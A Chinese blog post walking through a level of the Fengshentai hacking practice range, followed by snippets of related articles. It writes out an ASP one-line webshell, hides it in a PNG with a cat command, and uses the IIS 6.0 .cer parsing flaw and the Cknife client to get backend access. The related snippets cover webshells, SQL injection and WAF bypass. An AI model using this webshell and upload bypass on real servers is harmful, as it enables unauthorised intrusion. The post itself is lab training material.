mbp 封神台靶场 五 (笔记)

最新推荐文章于 2023-10-10 16:31:21 发布
最新推荐文章于 2023-10-10 16:31:21 发布
阅读量856 收藏 1
点赞数 1
分类专栏: 封神台靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43558415/article/details/104239822
版权

打开链接,发现需要使用上一关的cookie,删除flag并复制放入modheader中即可。
在这里插入图片描述或者用burp抓包替换cookie都可以,登录进去显示管理系统界面。
在这里插入图片描述看了题目的提示,需要上传脚本上去,搞到它的后台。点开各个页面,发现里面有可以上传的地方。
在这里插入图片描述便准备写一个一句话木马上传试一试,新建一个1.txt文件,输入<% eval request('mac') %>即可,并将后缀名改为1.asp,选择上传发现这种文件类型不能上传,只有规定的几种才能上传。
在这里插入图片描述于是想到了图片马,我在屏幕上随便截了个图命名2.png,通过终端将两个文件合成为3.png,步骤如下:

  • cd 目标文件夹 进入到mbp的存放桌面上
  • cat 1.asp 2.png > 3.png 将两个文件合并成新的文件

然后上传,发现成功,复制存储路径并放入cknife中。
在这里插入图片描述通过cknife加网址之后连接还是出错。注意到这个服务器是iis6.0,便百度搜索了iis6.0的漏洞,发现它会将cer文件解析成asp文件。
在这里插入图片描述
然后我重新将3.png改为3.cer进行上传,重复上面操作,进入后台,得到flag。
在这里插入图片描述在这里插入图片描述
总结:本关通过上传木马来获得网页后台,在实际操作中先去了解了mac系统如何创建txt文件和合并文件的操作,之后成功制作图片马,一句话木马需要根据脚本语言进行填写,因为本站使用的asp脚本语言,所以用asp一句话木马。在服务器漏洞发现的基础上cknife(菜刀)对我的帮助也挺大,能对网站后台可视化管理。

qq_43558415
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1078
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
神台靶场尤里的复仇I第一第二第第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 4610
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
菜刀渗透
刘思成的博客
03-27 2470
快速搭建discuz论坛 使用kali下BurpSuite对discuz后台注入php木马 使用Cknife“菜刀”.上传webshell木马到网站 使用Webshell查看mysql数据库密码并盗取数据库 快速搭建discuz论坛 攻击思路 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞 2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用...
打狗棒法之:Cknife(C刀)自定义模式秒过安全狗(二)
qq_28247467的博客
03-30 1508
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 0×00 前言 亲爱的Chora小伙伴在上文说过,他是一个有责任心的基佬,要手把手为大家(不)负责任的讲解如何使用Cknife。于是他挥动着小皮鞭,给了身为小弟(弟)的我24小时速成JSP、ASP.NET。在这种极度威逼利诱之下,我不负责任的攒出了绕狗第二式,内容过于冗长,还望请各位看官耐着性子,看
神台靶场-第
Mr_helloword的博客
07-11 1807
章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
如何用软件切换视网膜屏MBP笔记本分辨率.docx
09-27
如何用软件切换视网膜屏MBP笔记本分辨率.docx
Matlab实现GA-APSO-MBP、GA-MBPMBP、BP多输入单输出回归预测(完整源码和数据)
最新发布
01-18
1.Matlab实现GA-APSO-MBP、GA-MBPMBP、BP多输入单输出回归预测(完整源码和数据); 2.改进遗传-粒子群算法优化双层BP神经网络多输入单输出回归预测(含遗传优化双层BP神经网络、双层BP神经网络、单层BP神经网络)...
mbp
03-21
【标题】"Mbp"可能指的是苹果公司的MacBook Pro,一款高性能的专业级笔记本电脑,深受开发者、设计师和其他专业用户喜爱。在与PHP相关的上下文中,我们可以假设这是一个关于在MacBook Pro上配置和使用PHP开发环境的...
MBP1617WIN10NET.zip
08-14
标题“MBP1617WIN10NET.zip”表明这是一个包含特定驱动程序的压缩文件,主要用于解决MacBook Pro 15、16、17型号在安装Windows 10操作系统后可能出现的无线网络适配器问题。这个压缩包可能包含了针对这些MacBook Pro...
MBP_2019.rar
07-14
标题“MBP_2019.rar”暗示我们可能正在处理与苹果公司的MacBook Pro (MBP) 2019型号相关的数据或资源。这种压缩包可能包含有关该特定设备的技术规格、软件更新、用户手册、驱动程序、故障排除指南或者用于模拟和测试...
神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 1648
神台靶场 第一章:为了女神小芳 (SQL注入)
神台靶场 - Kali系列
Hong__Cheng的博客
06-07 483
我在参考 旧目难忘 大佬的文章时。我看到接下来的操作时,有点懵逼了,这么复杂的嘛?不是就是要管理员密码?所以我直接就进入到phpstudy中去找果然,如图的三个文件,文件名中有admin的,我猜测这其中就有我想要的密码,直接下载下来。最近一直在打靶场,这个《Kali渗透 - Sqlmap实操靶场》搞了好久都没搞出来,在网上搜索教程也不多,但今天突然灵光一现找到的flag,特意发出来与大家分享,我也是初学者,耍了点小聪明,不过也算是成功了。我用的Notepad++依次打开这些文件,其中一个是这样的。
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 1376
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
神台ctf练习靶场——一月靶场
AlunXZhou的博客
03-18 1491
神台刷题
神台(尤里的复仇),信息收集1--靶场练习,纯手工注入
久恙502的博客
10-10 533
尤里的复仇,做过一遍重新复现一次,练习渗透测试
神台章:SYSTEM!POWER!(webshell控制目标 )
m0_65712192的博客
10-19 1003
神台章:SYSTEM!POWER!(webshell控制目标 )
神台靶场
m0_71518346的博客
10-18 662
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
全!CTF靶场、渗透实战靶场总结 (适合收藏)
热门推荐
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
神台靶场跑不了爆破,临时解决办法(亲测有效)
hackzkaq的博客
04-19 3442
最近很多15期的同学都在反馈,靶场跑不了爆破 本人也实测靶场的防护是短时间内ban掉访问频率过快的ip 同样在实战用也会遇到这样的问题,我们不能改变环境的情况下,我们就去适应环境 那么绕过防护的方法目前能实现的就只有两个 1、降低访问频率 2、每次访问使用不同的ip 这两种方法我都帮同学们去实践了,你们按照我测出来的方法直接用就好 第一种,降低访问频率 这种方法目前只在靶场有效,实战中需要根据目标站点的具体防护进行测试 在burp跑爆破的时候,我们需要设置线程数 靶场我在经历过无数次被ban以后,测试出
mbp idea git
10-08
对于您提到的 "mbp idea git",这是一个包含三个不同的关键词:MBP(MacBook Pro),IDEA(IntelliJ IDEA)和Git。我将为您解释每个关键词的含义: 1. MBP(MacBook Pro)是一款由苹果公司设计和销售的笔记本电脑...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值